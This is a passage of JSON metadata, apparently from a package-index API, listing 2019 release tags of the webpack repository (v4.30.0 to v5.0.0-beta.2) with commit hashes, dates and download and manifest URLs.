hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0